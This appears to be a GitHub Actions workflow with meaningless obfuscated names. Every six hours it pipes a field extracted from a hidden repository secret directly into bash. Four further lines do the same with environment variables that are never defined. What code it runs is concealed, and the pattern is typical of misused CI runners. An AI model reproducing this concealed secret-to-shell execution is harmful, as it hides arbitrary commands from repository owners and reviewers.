name: shangfeixingneng
on:
  workflow_dispatch:
  schedule:
    - cron: '42 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shangfeixingneng
        env:
          z21: ${{ secrets.z21 }}
        run: |
          echo $z21 | jq -r .r8342 | /bin/bash
          echo $yzolx8 | jq -r .k441 | /bin/bash
          echo $a18 | jq -r .vlb2905 | /bin/bash
          echo $ebk984 | jq -r .a6326 | /bin/bash
          echo $x2 | jq -r .fiqa5 | /bin/bash

